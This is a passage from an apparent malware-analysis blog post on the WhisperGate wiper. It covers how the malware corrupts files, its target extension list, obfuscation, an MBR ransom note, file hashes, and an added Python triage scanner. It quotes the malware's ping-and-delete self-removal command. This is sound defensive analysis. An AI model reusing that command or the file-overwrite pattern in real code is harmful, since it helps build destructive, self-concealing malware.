center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">InstallUtil.exe properties</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">During execution, this program writes 22.53 GB of data to the disk. 
The original program does not contain any suspicious code, so we can suppose that WhisperGate injects malicious code into this process to carry out the file corruption.</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 377px; overflow: hidden; width: 294px;"><img height="377" src="https://lh6.googleusercontent.com/COv6-HFbRSx0w8T6YvGXkooLFV2SgRjWK1foY46bKBqOAGI2xdmk9IkxptyOTSTWnO1ENrwajK5IgLrfXsJjWdNC1Tf-rTuGZzbtP5AurrIY5BmHEm2HSZDUDvpMLjSpfKo3of68" style="margin-left: 0px; margin-top: 0px;" width="294" /></span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The File Wiper corrupts files with the following extensions:</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"></span></p><blockquote><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">.HTML .HTM .PHTML .PHP .JSP .ASP .PHPS .PHP5 .ASPX .PHP4 .PHP3 .DOC .DOCX .XLS .XLSX .PPT .PPTX .PST .MSG .EML .TXT .CSV .RTF .WKS 
.WK1 .PDF .DWG .JPEG .JPG .DOCM .DOT .DOTM .XLSM .XLSB .XLW .XLT .XLM .XLC .XLTX .XLTM .PPTM .POT .PPS .PPSM .PPSX .HWP .SXI .STI .SLDX .SLDM .BMP .PNG .GIF .RAW .TIF .TIFF .PSD .SVG .CLASS .JAR .SCH .VBS .BAT .CMD .ASM .PAS .CPP .SXM .STD .SXD .ODP .WB2 .SLK .DIF .STC .SXC .ODS .3DM .MAX .3DS .STW .SXW .ODT .PEM .P12 .CSR .CRT .KEY .PFX .DER .OGG .JAVA .INC .INI .PPK .LOG .VDI .VMDK .VHD .MDF .MYI .MYD .FRM .SAV .ODB .DBF .MDB .ACCDB .SQL .SQLITEDB .SQLITE3 .LDF .ARC .BAK .TAR .TGZ .RAR .ZIP .BACKUP .ISO .CONFIG</span></blockquote><p></p><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhDYpGJJizNfp4TO5Y0RvQiu3JJKmGqbk4pEtSSKCZmNWQ3yKaj63-tWN5l44CG0O5V7ttrcCtRbChgQgRjcMykwAIBb4BVoP4Pgw4uwU8vzr_6rYJngcEnsxBVwiCWIYSRBTCVQMFzFamRSk9RXDaXPG625kS8CMyqjYzWLYdcv9jdv6Dy5Cprc_BsKg" style="margin-left: auto; margin-right: auto;"><img alt="" data-original-height="336" data-original-width="476" src="https://blogger.googleusercontent.com/img/a/AVvXsEhDYpGJJizNfp4TO5Y0RvQiu3JJKmGqbk4pEtSSKCZmNWQ3yKaj63-tWN5l44CG0O5V7ttrcCtRbChgQgRjcMykwAIBb4BVoP4Pgw4uwU8vzr_6rYJngcEnsxBVwiCWIYSRBTCVQMFzFamRSk9RXDaXPG625kS8CMyqjYzWLYdcv9jdv6Dy5Cprc_BsKg=s16000" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"></td></tr></tbody></table><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgkMEOiidXQgJg87w3MZgUapfDIhTKD-TslnqvC485LeqRU1XVS8mVXJCkDI0EAyM5kAFenqLeQU94WPCrwGLR_p0buGcZU1bkCjR5bfG5vnTkWOE2OhGpHcSHesN6hn1R-VE5C8xclGLrlWygUinz5OkHWvE244qSI47IbfdQvll4VKHOINpN6O-0ERw" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="538" data-original-width="644" 
src="https://blogger.googleusercontent.com/img/a/AVvXsEgkMEOiidXQgJg87w3MZgUapfDIhTKD-TslnqvC485LeqRU1XVS8mVXJCkDI0EAyM5kAFenqLeQU94WPCrwGLR_p0buGcZU1bkCjR5bfG5vnTkWOE2OhGpHcSHesN6hn1R-VE5C8xclGLrlWygUinz5OkHWvE244qSI47IbfdQvll4VKHOINpN6O-0ERw=s16000" /></a></div><p></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">If the file extension matches one of these stored extensions, the contents of the file are overwritten with 100000h (1048576) bytes of the ‘0xC’ byte value, and a random 4-byte suffix is appended to its extension.</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"></p><div class="separator" style="clear: both; text-align: left;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEggcht37XSoV4Zcur3_QaXNTc2fPK9ENfNKUFML6PKgcpthaLvY9Ds--7wGRMPYQOC6jO976oNIKXZH8Fc8nivW6FROV0iZU74Ksn6_emUvsU5zkox4dugsx_DjKJZtbfNvWKR945-FAEPd6N77lTwcm4lVlw3gCS4MRd3h8PKaNHFtXQQLraTQSZSDzg" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="620" data-original-width="1095" src="https://blogger.googleusercontent.com/img/a/AVvXsEggcht37XSoV4Zcur3_QaXNTc2fPK9ENfNKUFML6PKgcpthaLvY9Ds--7wGRMPYQOC6jO976oNIKXZH8Fc8nivW6FROV0iZU74Ksn6_emUvsU5zkox4dugsx_DjKJZtbfNvWKR945-FAEPd6N77lTwcm4lVlw3gCS4MRd3h8PKaNHFtXQQLraTQSZSDzg=s16000" /></a></div><br /><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgmyNFzRFNcDwSP6f-ICa9G2RVmCFL04qu6VHLMc59ideAw2_Fz7YduSOn6CtZ-ttAt0Og1pFG9jQMz7YKiZjuoPoLlhyJcS9dq6-m6SPLaVgILNECpdA8LJb2sFLDnAjovzvLm_XqvhqWMAKRUf0_wFFk5CtrZ25se8djU8z8EXO-5sMiGkCKCP7yUiQ" style="font-family: Arial; font-size: 11pt; margin-left: 1em; margin-right: 1em; white-space: pre-wrap;"><img alt="" data-original-height="167" data-original-width="1247" 
src="https://blogger.googleusercontent.com/img/a/AVvXsEgmyNFzRFNcDwSP6f-ICa9G2RVmCFL04qu6VHLMc59ideAw2_Fz7YduSOn6CtZ-ttAt0Og1pFG9jQMz7YKiZjuoPoLlhyJcS9dq6-m6SPLaVgILNECpdA8LJb2sFLDnAjovzvLm_XqvhqWMAKRUf0_wFFk5CtrZ25se8djU8z8EXO-5sMiGkCKCP7yUiQ=s16000" /></a><p></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Once file corruption is complete, the malware executes a </span><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">ping</span><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> command (a common delay trick) and then deletes itself:</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"></span></p><blockquote><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">"cmd.exe /min /C ping 111.111.111.111 -n 5 -w 10 > Nul & Del /f /q "%s"</span></blockquote><p></p><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt;"><span style="color: #434343; font-family: Arial; font-size: 14pt; 
font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Obfuscation</span></h3><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">All .NET files are obfuscated with Eazfuscator.NET. In addition, ‘stage2.exe’ has control-flow and method-name obfuscation.</span></p><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 11pt 0pt; text-align: left;"><span style="color: #141519; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 255px; overflow: hidden; width: 624px;"><img height="255" src="https://lh4.googleusercontent.com/5Kqo-BiTANn7U7LzJLfuUUFI1oIBJth1DkSYpyhwZ9emNNyHzJlXdTPiX0-pzJmwPbvqU6hlwJ7ARediEnTSN75Nv9b4VM0i35EhKEB8_Jjd31zAIKGfA5CoY3c_3HTgS9PH_OX5" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></p><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt; text-align: justify;"><span style="color: #434343; font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Ransom note</span></h3><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The ransom note is written to the MBR (the first sector of the boot disk) and is displayed on the screen when the system is rebooted.</span></p><br /><p 
dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 135px; overflow: hidden; width: 624px;"><img height="135" src="https://lh3.googleusercontent.com/n1velXzJzH7fkMdKzeyN3qTUhtq4DQ91SxE6E6gzEScDkas0uXgx9lX7ebdvPzhz4P-uybHsHFwWFWZXrl68DzBHDo_aMY93qdw2WbCoLtauTlCEhbMaZ0i5-NisHM8yjagyfqeN" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></p><br /><h2 dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 16pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Conclusion</span></h2><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">WhisperGate was used in the targeted attack against Ukrainian government websites in mid-January 2022. The operation consists of two stages. In the first stage, the malware overwrites the MBR with the ransom note, making the system unbootable and displaying the ransom message. In the second, the Trojan-Downloader fetches the malware that corrupts files by overwriting their contents with a fixed number of bytes. 
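</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">As an added example (not code from the post), the following Python performs a defender-side triage of the second stage described in the File Corrupter section: it walks a directory tree for files whose name ends in a known extension followed by a 4-character suffix and whose first 100000h bytes are one repeated byte value, which is exactly the shape the analysis describes. The directory contents, file names and the subset of extensions are constructed for the demonstration; the script reports the fill byte it finds rather than hard-coding one.</span></p>

```python
"""Post-incident triage for files overwritten by the WhisperGate corrupter.
Added example, not code from the post. The analysis states that a matching
file is overwritten with 100000h (1048576) bytes of one byte value and gets a
random 4-byte suffix appended to its extension; this script searches for
files of exactly that shape and reports the fill byte it finds."""
import os
import re
import tempfile

WIPE_LENGTH = 0x100000  # 1048576 bytes, as stated in the analysis

# Subset of the extension list quoted in the post; extend as needed.
TARGET_EXTENSIONS = ("docx", "xlsx", "pdf", "jpg", "png", "sql", "zip", "txt")

# A wiped name looks like  report.docx.Ab12  (known extension + 4 extra chars).
NAME_PATTERN = re.compile(
    r"\.(?:" + "|".join(TARGET_EXTENSIONS) + r")\.[^.\\/]{4}$", re.IGNORECASE)


def looks_like_wiped_name(name):
    """True when the file name matches 'original extension + 4-char suffix'."""
    return NAME_PATTERN.search(name) is not None


def uniform_prefix_byte(path, length=WIPE_LENGTH):
    """Return the byte value if the first `length` bytes of the file are all
    that one value; otherwise None. Only the prefix is read, so checking
    large files stays cheap."""
    with open(path, "rb") as fh:
        prefix = fh.read(length)
    if len(prefix) != length:
        return None
    fill = prefix[0]
    return fill if prefix == bytes([fill]) * length else None


def scan_tree(root):
    """Walk `root` and return {absolute path: fill byte} for files that match
    both the naming pattern and the uniform-prefix check."""
    found = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if not looks_like_wiped_name(name):
                continue
            path = os.path.join(dirpath, name)
            fill = uniform_prefix_byte(path)
            if fill is not None:
                found[path] = fill
    return found


def demo():
    """Constructed directory: one wiped-looking file, one intact document and
    one decoy with a suspicious name but real content. Returns the flagged
    files keyed by name relative to the directory."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "report.docx.a1b2"), "wb") as fh:
            fh.write(bytes([0x0C]) * WIPE_LENGTH)  # fill byte as given in the post
        with open(os.path.join(root, "report.docx"), "wb") as fh:
            fh.write(b"PK\x03\x04" + os.urandom(4096))  # intact OOXML-like file
        with open(os.path.join(root, "notes.txt.zzzz"), "wb") as fh:
            fh.write(b"not wiped, just oddly named\n" * 100)
        return {os.path.relpath(p, root): v for p, v in scan_tree(root).items()}


if __name__ == "__main__":
    for name, fill in demo().items():
        print(f"{name}: first 1 MiB is 0x{fill:02X} repeated")
```

<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Requiring both the name pattern and the uniform prefix keeps false positives down (a file that merely has an odd double extension is not reported), and because only the first 100000h bytes are overwritten, any data beyond that offset in a flagged file is still intact and worth carving.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">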
Although the malware broke the websites' functionality and all of them stopped working, they were restored the next day.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><h1 style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Watch the recording of the lecture on the WhisperGate analysis</span></h1><br /><div class="separator" style="clear: both; text-align: left;"><iframe allowfullscreen="" class="BLOG_video_class" height="266" src="https://www.youtube.com/embed/XxN4cINiLqA" width="320" youtube-src-id="XxN4cINiLqA"></iframe></div><br /><h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 16pt; font-weight: 400; white-space: pre-wrap;">IoCs </span></h2><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt;"><span style="color: #434343; font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Files</span></h3><br /><div align="left" dir="ltr" style="margin-left: 3pt;"><table style="border-collapse: collapse; border: none;"><colgroup><col width="108"></col><col width="488"></col></colgroup><tbody><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" 
style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">File name</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">SHA256</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://www.virustotal.com/gui/file/a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">stage1.exe</span></a></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 
0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://www.virustotal.com/gui/file/dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">stage2.exe</span></a></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; 
vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://www.virustotal.com/gui/file/923eb77b3c9e11d6c56052318c119c1a22d11ab71675e6b95d05eeb73d1accd6" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">Tbopbh.jpg</span></a></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">923eb77b3c9e11d6c56052318c119c1a22d11ab71675e6b95d05eeb73d1accd6</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://www.virustotal.com/gui/file/9ef7dbd3da51332a78eff19146d21c82957821e464e8133e9594a07d716d892d" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">Frkmlkdkdubkznbkmcf.dll</span></a></p></td><td style="border-bottom: solid #000000 
1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">9ef7dbd3da51332a78eff19146d21c82957821e464e8133e9594a07d716d892d</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://www.virustotal.com/gui/file/29ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">AdvancedRun.exe</span></a></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: 
pre-wrap;">29ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://www.virustotal.com/gui/file/db5a204a34969f60fe4a653f51d64eee024dbf018edea334e8b3df780eda846f" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">Nmddfrqqrbyjeygggda.vbs</span></a></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">db5a204a34969f60fe4a653f51d64eee024dbf018edea334e8b3df780eda846f</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a 
href="https://www.virustotal.com/gui/file/ac1a3f21fcc88f9cee7bf51581eafba24cc76c924f0821deb2afdf1080ddf3d3" style="text-decoration-line: none;"><span face="Roboto, sans-serif" style="background-color: white; color: #1155cc; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">InstallUtil.exe</span></a></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">ac1a3f21fcc88f9cee7bf51581eafba24cc76c924f0821deb2afdf1080ddf3d3</span></p></td></tr></tbody></table></div><br /><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #434343; font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Network indicators</span></h3><br /><div align="left" dir="ltr" style="margin-left: 0.75pt;"><table style="border-collapse: collapse; border: none;"><colgroup><col width="98"></col><col width="505"></col></colgroup><tbody><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span 
style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Type</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: white; color: #24292e; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Data</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p 